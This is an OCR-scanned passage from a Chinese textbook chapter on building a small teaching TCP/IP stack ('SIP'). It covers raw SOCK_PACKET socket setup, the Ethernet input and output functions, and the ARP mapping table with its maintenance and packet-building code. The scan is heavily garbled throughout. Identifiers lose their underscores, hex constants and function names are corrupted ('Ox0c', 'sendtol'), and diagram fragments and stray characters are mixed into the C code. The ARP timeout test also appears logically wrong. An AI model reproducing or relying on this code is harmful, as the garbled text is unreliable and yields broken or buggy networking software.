接 字 s 接 字 设置 地 址 、 设置 网 络 inputO) 、 
(SOCK_ | | 到 条 全 MAC | | 网 关 、 [下 类 型 为 | “| output0、 
PACKIET) 网 卡 地 址 i 802.3 oo 
图 19.9 SIP 网 络 接口 初始 化 过 程 


初始 化 虚拟 网 络 设备 的 代码 如 下 : 


static void sip init ethnet(struct net device *dev) 


DBGPRINT (DBG_LEVEL TRACE, "==>sip init ethnet\n"); 
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memset (dev, 0, sizeof(struct net device)); 
/* 初 始 化 网 络 设备 */ 
dev->s = socket (AF INET, SOCK PACKET, htons (ETH P ALL)); 
/* 建 立 一 个 SOCK_PACKET 套 接 字 */ 
if(dev->s > 0) /* 成 功 */ 
DBGPRINT (DBG LEVEL NOTES,"create SOCK PACKET fd success\n"); 
} 
else /* 失 败 */ 
{ 
DBGPRINT (DBG LEVEL ERROR, "create SOCK PACKET fd falureNn") 
exit(-1); 


1 
/* 将 此 套 接 字 绑 定 到 网 卡 ethl 上 */ 


strcpy (dev->name, "eth1"); /* 复 制 ethl 到 name*/ 
memset (&dev->to, '\0', sizeof(struct sockaddr)); 

/* 清 零 to 地 址 结构 */ 
dev->to.sa family = AF_ INET; /* 协 议 族 */ 


strcpy (dev->to.sa data, dev->name); /*to 的 网 卡 名 称 */ 
int r = bind(dev->s, &dev->to, sizeof(struct sockaddr)); 


/* 绑 定 套 接 字 s 到 eth1l 上 */ 


memset (dev->hwbroadcast，0xFE，ETH _RLEN) ; /* 设 置 以 太 网 的 广播 地 址 */ 


/* 设 置 MAC 地 址 */ 
dev->hwaddr [0] = 0x00; 
dev->hwaddr[1] = Ox0c; 


dev->hwaddr[2] = 0x29; 
dev->hwaddr[3] = 0x73; 
dev->hwaddr[4] = 0x9D; 
dev->hwaddr [5] = OxlF; 


dev->hwaddr len = ETH ALEN; /* 设 置 硬 件 地 址 长 度 */ 
dev->ip_host.s addr = inet addr ("172.16.12.250"); 

/* 设 置 本 机 IP 地 址 */ 
dev->ip_gw.s_addr = inet addr("172.16.12.1"); 

/* 设 置 本 机 的 网 关 IP 地 址 */ 
dev->ip netmask.s addr = inet addr("255.255.255.0"); 

/* 设 置 本 机 的 子 网 掩 码 地 址 */ 


dev->ip broadcast.s addr = inet addr("172.16.12.255"); 
/* 设 置 本 机 的 广播 IP 地 址 */ 


dev->input = input; /* 挂 接 以 太 网 输入 函数 */ 
dev->output = output; /* 挂 接 以 太 网 输出 函数 */ 
dev->linkoutput = lowoutput; /* 挂 接 底层 输出 函数 */ 
dev->type = ETH P 802 3; /* 设 备 的 类 型 */ 


DBGPRINT (DBG LEVEL TRACE,"<==sip init ethnet\n"); 


19.4.4 SIP 网 络 接口 层 的 输入 函数 


SIP 网 络 接口 层 的 输入 函数 用 于 从 网 卡 中 读 取 接 收 到 的 数据 ， 并 进行 相应 的 以 太 网 层 
的 处 理 。 


4 


1. 输入 函数 的 步骤 


如 图 19.10 所 示 ， 主 要 分 为 如 下 几 个 步骤 : 

(1) 从 套 接 字 中 读 取 数据 。 当 网 卡 中 有 新 的 数据 到 来 的 时 候 ， 可 以 从 之 前 建立 的 
SOCK_ PACKET 套 接 字 中 读 取 到 网 络 数据 ， 函 数 中 先 用 一 个 缓冲 区 将 网 络 数据 保存 起 来 ， 
当 确实 读 取 到 数据 之 后 ， 再 将 读 取 到 的 数据 复制 到 临时 申请 的 skbu 企 数据 结构 中 。 

接收 数据 


从 套 接 字 s 中 
读 取 数据 


申请 skbuff 结 构 
skb 


| 
到 skb 设置 skb 中 
的 数据 长 度 


否 
0 
否 全 
Y 1 
获取 IP 头 部 获取 ARP 头 部 释放 skb 释放 skb 
更 新 ARP 映 射 表 
1 
转 给 IP 层 处 理 
释放 skb 
im 
退出 一 


图 19.10 SIP 网 络 接口 层 的 输入 函数 
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(2) 当 读 取 到 网 络 数据 后 ， 申 请 一 个 skbuff 数据 结构 skb， 其 数据 空间 的 大 小 为 读 取 
的 网 络 数据 字 节 数 。 然 后 将 读 取 到 的 数据 复制 到 这 个 skbu 仔 结构 中 。 之 后 对 数据 的 处 理 就 
完全 基于 skb 了 。 

(3) 判断 接收 到 的 网 络 数据 的 目的 地 址 是 否 为 本 机 的 目的 地 址 或 者 为 广播 的 地 址 ， 即 
查看 其 中 的 MAC 地 址 是 否 相 符 。 

(4) 根据 以 太 网 头 部 的 协议 类 型 判断 其 中 的 协议 类 型 。 如 果 为 卫 类 型 ， 则 更 新 ARP 
表 后 交 给 IP 层 处 理 ; 如 果 为 ARP 类 型 ， 就 转交 给 ARP 模块 进行 处 理 ; 为 其 他 类 型 ， 则 丢 
弃 此 类 数据 。 

2. 输入 函数 的 实现 代码 

输入 函数 的 实现 代码 如 下 所 示 。 程 序 从 套 接 字 中 读 取 数 据 后 ， 申 请 一 个 struct skbuff 
类 型 的 结构 存放 数据 ， 然 后 获得 以 太 网 头 部 结构 ， 根 据 头 部 结构 中 的 类 型 ， 进 行 不 同 的 处 
理 : ETH_P_IP 类 型 的 交 由 IP 模块 处 理 ，ETH_P_ARP 类 型 的 交 由 ARP 模块 进行 处 理 ， 其 
他 类 型 的 将 接收 到 的 网 络 数据 抛弃 。 


static _u8 input(struct skbuff *pskb，struct net device *dev) 


由 


DBGPRINT (DBG LEVEL TRACE,"==>input\n"); 

char ef[ETH FRAME LEN]; /* 以 太 帧 缓冲 区 ,1514 字 节 */ 
int Dr EY 

int retval = 

记 训 大 以 天 网 站 所 为 返回 的 实际 捕获 的 以 太 帧 的 帧 长 */ 

n = read(dev->s, ef, ETH FRAME LEN); 


if(n <=0) /* 没 有 读 到 数据 */ 
{ 
DBGPRINT (DBG LEVEL ERROR,"Not datum\n"); 
retval = -1; 
goto EXITinput; /* 退 出 */ 
} 
else /* 读 到 数据 */ 


中 
DBGPRINT (DBG LEVEL NOTES,"%d bytes datum\n", n); 
}; 
struct skbuff *skb = skb alloc(n); /* 申 请 存放 刚才 读 取 到 数据 的 空间 #/ 


if(!skb) /* 申 请 失败 */ 
{ 
retval = -1; 
goto ExXITinput; /* 退 出 */ 
} 
memcpy (skb->head, ef, n); /* 将 接收 到 的 网 络 数据 复制 到 skb 结构 */ 
skb->tot len =skb->len= n; /* 设 置 长 度 值 */ 
skb->phy.ethh= (struct sip ethhdr*) skb put (skb, sizeof (struct 


sip ethhdr) ) ; /* 获 得 以 太 网 头 部 指针 */ 
if(samemac (skb->phy.ethh->h dest, dev->hwaddr) 


/* 数 据 发 往 本 机 ?*/ 

11 samemac (skb->phy.ethh->h dest, dev->hwbroadcast)) 
/* 广 播 数据 ?2*/ 

{ 

switch (htons (skb->phy.ethh->h proto)) 
/* 查 看 以 太 网 协议 类 型 */ 

{ 

case ETH P_IP: /*IP 类 型 */ 


.573 


第 4 篇 综合 案例 


skb->nh.iph = (struct sip iphdr*) skb put (skb, sizeof (str- 
uct sip iphdr)); /* 获 得 IP 头 部 指针 */ 
/* 将 刚才 接收 到 的 网 络 数据 用 来 更 新 ARP 表 中 的 映射 关系 */ 
arp add entry(skb->nh.iph->saddr, skb->phy.ethh->h source, 
ARP ESTABLISHED); 


ip input (dev, skb); /* 交 给 IP 层 处 理 数 据 */ 
break; 
case ETH P ARP: /*ARP 类 型 */ 
{ 
/* 获 得 ARP 头 部 指针 */ 


skb->nh.arph = (struct sip arphdr*) skb put (skb, sizeof(st- 
ruct sip arphdr)); 


if(*(( be32*)skb->nh.arph->ar tip) == dev->ip host.s ad- 
dr) /* 目 的 IP 地 址 为 本 机 ?*/ 
ii 
arp_input(&skb，dev) ; /*RRP 模块 处 理 接收 到 的 ARP 数据 */ 
} 
skb free(skb); /* 释 放 内 存 */ 
break; 
default: /* 默 认 操 作 */ 
DBGPRINT (DBG LEVEL ERROR, "ETHER:UNKNOWN\n"); 
skb free(skb); /* 释 放 内 存 */ 
break; 
} 
} 
else 
{ 
skb free(skb); /* 释 放 内 存 */ 
EXITinput: 


19.4.5 
SIP 
和 


SP 


DBGPRINT (DBG LEVEL TRACE,"<==input\n"); 
return 0; 


SIP 网 络 接 口 层 的 输出 函数 
网 络 接口 层 输出 函数 的 作用 是 将 上 层 发 送 的 数据 通过 这 一 层 发 送出 去 。 
底层 发 送 函数 lowoutput() 
网 络 接口 层 的 底层 输出 函数 lowouput() 直 接 将 网 络 数据 发 送出 去 ， 代 码 如 下 所 示 。 


主要 的 处 理 片段 为 遍历 skbuff 结构 链 , 将 所 有 的 数据 通过 套 接 字 发 送出 去 。 前 面 已 经 提 到 ， 
SOCK _ PACKET 类 型 的 套 接 字 要 设置 发 送 的 目的 网 卡 才 能 成 功 发 送 网 络 数据 ,之 前 这 个 套 
接 字 已 经 绑 定 了 ethl 网 卡 。 发 送 网 络 数据 的 过 程 先 查看 当前 的 skbu 人 f 结构 是 否 为 空 ， 如 果 
不 为 空 则 使 用 sendto0) 函 数 发 送 网 络 数据 ， 然 后 移 到 下 一 个 skbuff 结构 (通过 next 指针 )， 


释放 已 经 发 送 的 数据 skbuff。 


static _u8 lowoutput(struct skbuff *skb， struct net device *dev) 


| 


.574 。 


DBGPRINT (DBG LEVEL TRACE,"==>lowoutput\n"); 
Ln 

int len = sizeof(struct sockaddr); 

struct skbuff *p =NULL; 
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/* 将 skbuff 链 结构 中 的 网 络 数据 发 送出 去 */ 
for (p=skb; /* 从 skbuff 的 第 一 个 结构 开始 */ 
p!= NULL; /* 到 末尾 一 个 结束 */ 
Skb= p, p=p->next, skb free(skb),skb=NULL) 
/* 发 送 完 一 个 数据 报 文 后 移动 指针 并 释放 结构 内 存 */ 


n = sendtol(dev->s, skb->head, skb->len,0, &dev->to, len); 
/* 发 送 网 络 数据 */ 
DBGPRINT (DBG LEVEL NOTES,"Send Number, n:%d\n",n); 


外 
DBGPRINT (DBG LEVEL TRACE,"<==lowoutput\n"); 
return 0; 


上 层 发 送 函 数 output() 


SIP 网 络 接口 层 的 output(0) 函 数 在 对 需要 发 送 的 数据 进行 判断 和 处 理 后 ,通过 lowouput() 
函数 将 网 络 数据 发 送出 去 ， 如 图 19.11 所 示 。 主 要 包含 如 下 步骤 : 


发 送 数据 


查找 ARP 表 
获得 MAC 地 址 


设置 报 文 以 太 网 目 
的 地 址 为 表 项 MAC 


= 
设置 报 文 以 太 网 源 
地 址 为 本 机 MAC 


设置 报 文 以 太 网 协 
议 类 型 为 IP 类 型 


| 


调用 lowoutput 
发 送 报 文 


图 19.11 SIP 网 络 接口 层 的 输出 模块 过 程 


se 
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(1) 判断 目的 人 P 地 址 是 否 为 本 网 段 ， 如 果 不 是 本 网 段 则 将 目的 人 P 地 址 修改 为 网 关 的 
JP 地址 ， 让 网 关 将 网 络 数据 转发 出 去 。 

(2) 查找 ARP 表 中 对 应 目的 IP 地 址 的 MAC 地 址 ， 找 到 对 应 项 之 后 ， 则 将 要 发 送 数 
据 的 以 太 网 头 部 结构 中 的 目的 地 址 设置 为 查 到 的 MAC 地 址 、 将 源 地 址 设置 为 本 机 的 MAC 
地 址 、 将 以 太 网 所 承载 数据 的 类 型 设置 为 IP 类 型 。 

(3) 调用 lowoutput(0) 函 数 发 送 数 据 。 

output() 函 数 的 实现 代码 如 下 ， 在 进行 IP 地 址 和 MAC 地 址 的 映射 表 项 查找 的 时 候 ， 
假设 5 次 超时 ， 如 果 5 次 ARP 请 求 仍然 没有 合适 的 映射 项 发 现 ， 则 表明 没有 此 类 的 映 


射 项 。 


static _u8 output (struct skbuff *skb, struct net device *dev) 


' 


DBGPRINT (DBG LEVEL TRACE,"==>output\n"); 
int retval = 0; 


struct arpt arp *arp = NULL; 
int times = 0,found = 0; 
/* 发 送 网 络 数 据 的 目的 IP 地 址 为 skb 所 指 的 目的 地 址 */ 
_ be32 destip = skb->nh.iph->daddr; 
/* 判 断 目的 主机 和 本 机 是 否 在 同一 个 子 网 上 */ 
if((skb->nh.iph->daddr & dev->ip 
_netmask.s_addr ) 
!= (dev->ip host.s addr & dev->ip netmask.s_addr)) 
{ 
destip = dev->ip_gw.s_addr; /* 不 在 同一 个 子 网 上 , 将 数据 发 送 给 网 关 */ 


1 
/* 分 5 次 查找 目的 主机 的 MAC 地 址 */ 
while((arp = arp find entry(destip)) == NULL && times < 5) 
/* 查 找 MAC 地 址 */ 
{ 
arp_request (dev, destip); /* 没 有 找到 , 发送 ARP 请 求 */ 
sleep(1); /* 等 一 会 */ 
times ++; /* 计 数 增加 */ 
} 
if(!arp) /* 没 有 找到 对 应 的 MAC 地 址 */ 


: retval = 1; 
goto EXIToutput; 
} 
else /* 找 到 一 个 对 应 项 */ 
上 
struct sip ethhdr *+eh = skb->phy.ethh; 
memcpy (eh->h dest, arp->ethaddr, ETH ALEN); 
/* 设 置 目 的 MAC 地 址 为 项 中 值 */ 
memcpy (eh->h_source, dev->hwaddr, ETH ALEN); 
/* 设 置 源 MAC 地 址 为 本 机 MAC 值 */ 
eh->h proto = htons (ETH P_IP); /* 以 太 网 的 协议 类 型 设置 为 IP*/ 
dev->linkoutput (skb, dev); /* 发 送 数据 */ 


EXIToutput: 


-a 


DBGPRINT (DBG_ LEVEL TRACE,"<==output\n"); 
return retval; 
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19.5 SIP 网 络 协议 栈 的 ARP 层 


ARP 层 的 作用 主要 进行 网 络 IP 地 址 和 硬件 地 址 (MAC 地 址 ) 之 间 的 映射 关系 。 在 SIP 
网 络 协议 栈 中 ARP 层 的 作用 主要 有 两 个 ， 一 个 是 维护 MAC 地 址 和 IP 地 址 的 映射 表 ， 另 
一 个 是 提供 基本 的 ARP 操作 函数 供 其 他 模块 调用 。 


19.5.1 SIP 地 址 解析 层 的 架构 


SIP 网 络 协议 栈 的 ARP 层 给 其 他 模块 (IP 层 ) 提 供 MAC 地 址 和 人 P 地址 的 映射 表 查 询 ， 
提供 获得 表格 信息 的 接口 。 主 要 有 3 种 对 外 的 接口 ，SIP 中 ARP 层 的 主要 函数 关系 如 
图 19.12 所 示 。 

口 arp_input(O) 函 数 对 从 网 络 接口 层 输 入 的 网 络 数据 进行 解析 ， 更 新 ARP 映射 表 ， 并 
响应 其 他 主机 的 ARP 请 求 。 

口 arp_request() 函 数 用 于 查询 ARP 映射 表 为 空 的 IP 地 址 对 应 的 MAC 地 址 ， 向 局 域 
网 内 广播 请 求 ， 然 后 由 arp_input() 函 数 记 录 主 机 的 响应 信息 。 

口 函数 init_arp_entry() 和 函数 arp_find_entry() 用 于 单独 的 操作 。 初 始 化 函数 对 ARP 
的 映射 表 进 行 赋 初 值 ， 而 查询 函数 则 提供 其 他 模块 对 映射 表 进行 查询 的 接口 。 


arp_input() | arp_add entry() 


update_arp_entry() 上- 一" arp find_entry() 


| arp_send() 上- 一] arp_create() 


dev->1inkoutput () 


arp_request () “上 arp_create() 


dev->linkoutput () 


init_arp_entry() 


图 19.12 SIP 中 ARP 层 的 主要 函数 关系 


19.5.2 SIP 地 址 解析 层 的 数据 结构 


SIP 的 ARP 层 数 据 结 构 主 要 包含 两 类 ， 一 类 是 ARP 头 部 和 内 容 的 数据 结构 ， 另 一 类 
是 ARP 映射 表 的 数据 结构 ， 如 图 19.13 所 示 。 包 含 以 太 网 头 部 在 内 的 ARP 头 部 和 内 容 的 
数据 结构 分 为 sip_ethhdr 和 sip_arphdr 两 个 ， 这 两 个 结构 包含 了 以 太 网 中 ARP 层 中 的 所 有 
数据 。 以 太 网 头 部 在 前 面 已 经 进行 了 介绍 ，ARP 数据 结构 主要 包含 ARP 头 部 和 ARP 数据 
两 部 分 。 

结构 sip_arphdr 的 定义 如 下 所 示 ， 主 要 包含 以 ARP 头 部 和 ARP 数据 两 部 分 内 容 。 
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| 以 太 网 头 部 ARP 请 求 /应 答 
I EN EE a ee a ed 

硬件 地 址 | 硬件 地 址 址 长 度 | 址 长 度 方式 | 件 地 址 | 下 地 址 | 件 地 址 |IP 地 址 

Sip_ethhdr sip_arphdr 

arhln 本 pln ar_op | ar_sha | ar-sip 


ar_tha | ar_tip 


h_dest | h_source |h_protq ar 二 ar_pro 


(6 字 节 ) (6 字 节 ) (2 字 芹 (2 字 莘 2 字 节 MI 字 物 (! 字 和 草 02 字 莘 6 字 物 Q 字 物 (6 字 物 (2 字 宴 
图 19.13 ARP 协议 类 型 结构 


口 ARP 头 部 结构 : 参数 ar_hrd 为 硬件 地 址 类 型 ， 参 数 ar_pro 为 协议 地 址 类 型 ， 参 数 
ar_hln 为 硬件 地 址 长 度 ; 参数 ar_pln 为 协议 地 址 长 度 ; 参数 ar_op 为 ARP 操作 码 。 

口 ARP 以 太 网 协议 的 内 容 部 分 :ar _sha[ETH_ALEN] 为 发 送 方 的 硬件 地 址 ;ar sip[4] 
为 发 送 方 的 IP 地 址 ; ar_ tha[ETH ALEN] 为 目的 硬件 地 址 ; ar_ tip[4] 为 目的 卫 地 址 。 


struct sip arphdr 
{ 


/* 以 下 为 ARP 头 部 结构 */ 
_ bel16 ar hrd; /* 人 硬件 地 址 类 型 */ 
_ bel6 ar pro; /* 协 议 地 址 类 型 */ 
_u8 ar_hln; /* 硬 件 地 址 长 度 */ 
_u8 ar_pln; /* 协 议 地 址 长 度 */ 
_ bel6 ar_op; /*ARP 操作 码 */ 

/* 以 下 为 以 太 网 中 的 ARP 内 容 */ 
_u8 ar_sha[ETH ALEN]; /* 发 送 方 的 硬件 地 址 */ 
_u8 ar_sip[4]; /* 发 送 方 的 IP 地 址 */ 
_u8 ar_tha[ETH ALEN]; /* 目 的 硬件 地 址 */ 

u8 artiplAl /* 目 的 IP 地 址 */ 


ARP 映射 表 结 构 是 对 ARP 层 IP 地 址 和 MAC 地 址 对 应 关系 的 映射 主要 结构 ， 其 结构 
定义 代码 如 下 : 


struct arpt arp /*ARP 表 项 结构 */ 
‘ 
_u32 ipaddr; /*IP 地 址 */ 
_u8 ethaddr [ETH ALEN]; /*MAC 地 址 */ 
time t ctime; /* 最 后 更 新 时 间 */ 
enum arp_status status; /*ARP 状态 值 */ 


] 


如 图 19.14 所 示 ， 一 个 arpt_am 结构 的 成 员 主要 含义 如 下 : 

口 参数 ipaddr 为 表 项 中 卫 地 址 ; 

口 参数 ethaddr[ETH_ALEN] 为 表 项 中 IP 地 址 对 应 的 MAC 地 址 ; 

口 参数 ctime 为 上 述 IP/MAC 地 址 对 的 最 后 更 新 时 间 , 这 是 为 了 防止 映射 对 的 存在 时 
间 过 长 发 生 失效 ， 最 后 更 新 时 间 ; 

口 参数 status 为 ARP 映射 对 的 状态 值 ， 目 前 实现 两 种 状态 ， 即 ARP_EMPTY 和 
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ARP_ESTABLISHED， 其 中 前 者 表示 ARP 状态 为 空 ， 后 者 表示 ARP 已 经 映射 表 
项 建立 。 


最 后 更 新 时 间 
ARP 表 项 状态 值 


—u32 ipaddr 
_u8 ethaddr[ETH ALEN]: 
Time_t ctime; 
arp_status status; 


图 19.14 ARP 映射 表 的 数据 结构 示意 图 


19.5.3 SIP 地 址 解析 层 的 映射 表 


SIP 网 络 协议 栈 中 ARP 映射 表 实 现 了 IP 和 MAC 对 的 映射 关系 , 并 进行 超时 失效 的 策 
略 ， 默 认 的 映射 表 为 10 个 , 超时 时 间 为 20s。 映 射 表 的 状态 更 新 是 映射 表 的 一 个 核心 功能 ， 
如 图 19.15 所 示 ， 映 射 表 主 要 有 两 种 状态 : ARP_EMPTY 和 ARP_ESTABLISHED。 
口 ARP_EMPTY 状态 : 在 arp 映射 表 初 始 化 的 时 候 ， 映 射 表 项 均 为 ARP_EMPTY 状 
态 。 映 射 表 项 中 有 一 个 超时 机 制 ， 每 当 可 以 查看 映射 表 的 时 候 ， 总 是 先 判 断 其 中 
的 时 间 惟 是 否 超 时 , 如 果 超 时 则 将 原来 为 ARP_ESTABLISHED 状态 的 项 的 状态 改 
为 ARP EMPTY。 
口 ARP_ ESTABLISHED 状态 : 在 接收 到 一 个 合法 的 ARP 协议 类 型 的 数据 时 , 不 管 是 
请 求 还 是 应 答 都 会 对 表 项 中 的 状态 进行 ARP_ESTABLISHED 的 设置 。 当 有 IP 协 
议 数据 到 来 的 时 候 ， 也 会 对 映射 表 项 进行 ARP_ESTABLISHED 的 更 新 操作 。 更 新 
映射 表 项 ， 一 方面 更 新 IP/MAC 映射 值 ， 另 一 方面 也 对 最 后 的 更 新 之 间 进 行 实 时 
更 新 ， 防 止 映射 对 的 失效 。 


init_arp_entry 


ARP_EMPTY 


超时 update_arp_entry 


SARP ESTABLISHED 


update_arp _entry 
图 19.15 ”映射 表 的 状态 更 新 
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19.5.4 ”SIP 地 址 解析 层 的 ARP 映射 表 维 护 函 数 
ARP 层 的 映射 表 相 关 函 数 名 称 和 函数 的 含义 ， 如 表 19.2 所 示 。 


表 19.2 ARP 映射 表 维 护 函 数 族 
函数 名 称 函数 含义 
init_arp_entry 初始 化 ARP 映射 表 
arp_find_entry ”| 查找 某 卫 对 应 的 映射 表 项 
update_arp_entry | 将 某 IP 的 映射 表 项 更 新 其 MAC 地 址 及 最 后 更 新 时 间 


向 映射 表 项 中 增加 新 的 映射 对 ， 如 果 IP 对 应 表 项 已 经 存在 ， 则 对 MAC 地 址 和 时 
arp_add _ entry 间 蕉 进行 更 新 


ARP 映射 表 初始 化 函数 对 整个 表 进 行 初始 化 , 主要 的 初始 化 动作 为 将 初始 时 间 置 为 0、 
MAC 地 址 置 为 0、 卫 地 址 置 为 0、 表 项 状态 置 为 空 ， 其 代码 实现 如 下 : 


void init arp entry() 


{ 


int i= 0; 

for(i = 0; i<ARP TABLE SIZE; i++) /* 初 始 化 整个 ARP 映射 表 */ 

{ 
arp_table[il.ctime = 0; /* 初 始 时 间 值 为 0*/ 
memset (arp_table[i].ethaddr, 0, ETH ALEN); /*MAC 地 址 为 0*/ 
arp_table[i].ipaddr = 0; /*IP 地 址 为 0*/ 
arp_table[i].status = ARP EMPTY; /* 表 项 状态 为 空 */ 

} 


} 


arp_find_entry() 函 数 的 作用 是 根据 输入 的 IP 地址 查找 映射 表 中 的 表 项 并 返回 ， 当 没有 
找到 合适 的 表 项 时 ， 返回 空 。 在 表 中 查找 匹配 IP 地 址 的 时 候 ， 对 当前 的 表 项 会 先 判 断 时 间 
惟 是 否 超时 ， 如 果 超 时 则 更 新 表 的 状态 为 ARP_EMPTY， 这 样 就 不 会 对 此 表 进 行 查询 了 。 
找到 一 个 合法 表 项 的 条 件 是 用 户 输 入 的 IP 地 址 与 表 中 的 IP 地 址 相同 ， 并 且 当 前 表 项 的 状 
态 为 ARP_ESTABLISHED。arp_find_entry() 函 数 的 代码 实现 如 下 : 


struct arpt arp* arp_ find entry(_ u32 ip) 


{ 
int i = -1; 
struct arpt arp*found = NULL; 
for(i = 0; i<ARP TABLE SIZE; i++) /* 在 ARP 表 中 查找 IP 匹配 项 */ 
{ 


ifl(arp table[i].ctime > time (NULL) + ARP LIVE TIME) 
/* 查 看 是 否 表 项 超时 */ 
arp table[i] .status = ARP EMPTY; /+ 超时 , 置 空 表 项 */ 
else if(arp table[i].ipaddr == ip  /#* 没 有 超时 ,查看 是 否 IP 地 址 匹配 */ 
&& arp table[i]l.status == ARP ESTABLISHED) 


/* 并 且 状 态 为 已 经 建立 */ 
{ 
found = &arp table[il]; /* 找 到 一 个 合适 的 表 项 */ 
break; /* 退 出 查找 过 程 #/ 


E 
} 


return found; 
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update_arp_entry() 函 数 更 新 映射 表 中 某 个 IP 地 址 的 MAC 地 址 映射 。 具 体 过 程 为 先 调 
用 arp_find_entry() 函 数 查找 是 否 有 合适 的 映射 表 项 ， 如 果 找 到 就 更 新 表 项 中 的 状态 为 
ARP_ ESTABLISHED， 复 制 MAC 地 址 为 新 的 值 ， 更 新 时 间 戳 。update_arp_entry() 函 数 的 
代码 实现 如 下 : 


struct arpt arp * update arp entry(_ u32 ip, _ u8 *ethaddr) 
{ 


struct arpt arp *found = NULL; 
found = arp find entry(ip); /* 根 据 IP 查找 ARP 表 项 */ 
if(found) { /* 找 到 对 应 表 项 */ 

memcpy (found->ethaddr, ethaddr, ETH RALEN) 

/* 将 给 出 的 硬件 地 址 复制 到 表 项 中 */ 
found->status = ARP ESTABLISHED;  ” /* 更 新 ARP 的 表 项 状态 */ 
found->ctime = time (NULL); /* 更 新 表 项 的 最 后 更 新 时 间 */ 

} 
return found; 


arp_add_entry() 函 数 向 映射 表 中 增加 新 的 IP/MAC 对 并 设置 相应 的 状态 。 具 体 实现 过 程 
先 调用 update_arp_entry() 函 数 更 新 表 项 ， 如 果 update_arp_entry() 函 数 无 效 ( 返 回 的 表 项 指 
针 为 空 )， 则 从 当前 表 中 查找 一 个 空 的 表 项 , 将 映射 对 的 数据 复制 进去 , 并 更 新 状态 和 时 间 
鹤 。arp_add_entry() 函 数 的 代码 实现 如 下 : 


void arp add entry( u32 ip, _ u8 *ethaddr, int status) 
{ 
int i = 0; 
struct arpt arp *found = NULL; 
found = update arp entry(ip，ethaddr); /* 更 新 ARP 表 项 */ 
if(!found) /* 更 新 不 成 功 */ 
{ /* 查 找 一 个 空白 表 项 将 映射 对 写 入 */ 
for(i = 0; i<ARP TABLE SIZE; i++) 
{ 
if(arp table[i].status == ARP EMPTY) 


/* 映 射 项 为 空 */ 
{ 
found = &arp table[i]; /* 重 置 found 变量 */ 
break; /* 退 出 查找 */ 
} 
k 
1 
if (found){ /* 对 此 项 进行 更 新 */ 
found->ipaddr = ip; /*IP 地 址 更 新 */ 
memcpy (found->ethaddr, ethaddr, ETH ALEN) 
/*MAC 地 址 更 新 */ 
found->status = status; /* 状 态 更 新 */ 
found->ctime = time (NULL); /* 最 后 更 新 时 间 更 新 */ 


19.5.5 ”SIP 地 址 解析 层 的 ARP 网 络 报 文 构建 函数 
在 发 送 ARP 请 求 或 者 相应 报 文 之 前 需要 创建 一 个 网 络 报 文 的 数据 结构 ，arp_create() 


i 
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函数 就 是 实现 上 述 的 功能 。arp_create() 函 数 的 作用 是 按照 用 户 给 定 的 参数 ， 构 建 一 个 发 往 


目的 主机 人 P 
target hw， 源 


地 址 为 dest ip、 目 的 主机 MAC 地 址 为 dest_ hw、 目 标 主机 MAC 地 址 为 


主机 IP 地 址 为 sre_ip、 源 主机 MAC 地 址 为 src_ hw，ARP 协议 类 型 为 type 


的 网 络 数据 包 。 
对 于 ARP 请 求 报 文 ， 目 的 主机 的 MAC 地 址 设置 为 广播 地 址 ， 即 一 个 为 0xFF 的 6 个 


字 节 数据 ， 而 


ARP 的 相应 报 文 则 需要 根据 ARP 请 求 报 文 的 主机 MAC 地 址 进行 填充 。 由 


于 ARP 请 求 有 可 能 会 经 过 网 关 的 转发 , 所 以 目标 主机 和 目的 主机 是 不 同 的 概念 , 目的 主机 


是 当前 子 网 中 可 以 直接 接收 到 ARP 数据 的 主机 ,而 目标 主机 是 可 能 需要 经 过 网 关 对 数据 的 
转发 才能 接收 到 ARP 请 求 的 主机 。 
arp_create() 函 数 的 实现 代码 如 下 ， 如 果 能 够 成 功 构建 网 络 数据 报 文 ， 会 返回 一 个 指向 
此 报 文 的 结构 skbuff 的 指针 : 
struct skbuff *arp create(struct net device *dev, /#+ 设 备 */ 
int type, /*ARP 协议 的 类 型 */ 
ET32STCETDE /* 源 主机 IP*/ 
_u32 dest ip, /* 目 的 主机 IP*/ 
_u8* src_hw, /* 源 主机 MAC*/ 
_u8* dest_hw, /* 目 的 主机 MAC*/ 
_u8* target hw) /+ 解析 的 主机 MAC*/ 


stru 
stru 


ct skbuff *skb; 
ct sip arphdr *arph; 


DBGPRINT (DBG LEVEL TRACE,"==>arp create\n"); 
/* 请 求 skbuff 结构 内 存 , 大 小 为 一 个 最 小 的 以 太 网 帧 , 60 字 节 */ 


Skb = skb alloc(ETH ZLEN); 
if (skb == NULL) /* 请 求 失 败 */ 
{ 

goto EXITarp create; /* 退 出 */ 
ee = Skb put(skb,sizeof(struct sip ethhdr)); 

/* 更 新 物理 层 头 部 指针 位 置 */ 
Skb->nh.raw = skb put(skb,sizeof(struct sip arphdr)); 

/* 更 新 网 络 层 头 部 指针 位 置 */ 
arph = skb->nh.arph; /* 设 置 ARP 头 部 指针 , 便于 操作 */ 
skb->dev = dev; /# 设 置 网 络 设备 指针 */ 
if (src_hw == NULL) /* 以 太 网 源 地 址 为 室 */ 

src_hw = dev->hwaddr; /* 源 地 址 设置 为 网 络 设备 的 硬件 地 址 */ 
if (dest hw == NULL) /* 以 太 网 目的 地 址 为 空 #/ 


Skb- 


memc: 


memcC: 


dest hw = dev->hwbroadcast; Ed 
>phy.ethh->h proto = htons (ETH P ARP) 
户 物 型 层 网 络 协议 设置 为 ARP 协议 */ 
py (Skb->phy.ethh->h dest, dest hw, ETH ALEN); 
/* 设 置 报 文 的 目的 硬件 地 址 */ 
py (Skb->phy.ethh->h_ source, src hw, ETH ALEN); 
/* 设 置 报 文 的 源 硬件 地 址 */ 


arph->ar op = htons (type); /* 设 置 ARP 操作 类 型 */ 
arph->ar_hrd = htons (ETH P_802 3); /* 设 置 ARP 的 硬件 地 址 类 型 为 802 .3*/ 
arph->ar pro = htons (ETH P IP); /* 设 置 ARP 的 协议 地 址 类 型 为 IP*/ 
arph->ar hln = ETH ALEN; /* 设 置 ARP 头 部 的 硬件 地 址 长 度 为 6*/ 


2 
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arph->ar pln = 4; /* 设 置 ARP 头 部 的 协议 地 址 长 度 为 4*/ 
memcpy (arph->ar_ sha, src hw, ETH ALEN); 
/*ARP 报 文 的 源 硬 件 地 址 */ 
memcpy (arph->ar sip, (_ u8*)&src ip, 4); 
/*ARP 报 文 的 源 IP 地 址 */ 
memcpy (arph->ar tip, (_ u8*)&dest ip, 4); 

/*ARP 报 文 的 目的 IP 地 址 */ 
if (target hw != NULL) /* 如 果 目 的 硬件 地 址 不 为 空 */ 
memcpy (arph->ar tha, target hw, dev->hwaddr len); 

/*ARP 报 文 的 目的 硬件 地 址 */ 
else /* 没 有 给 出 目的 硬件 地 址 */ 
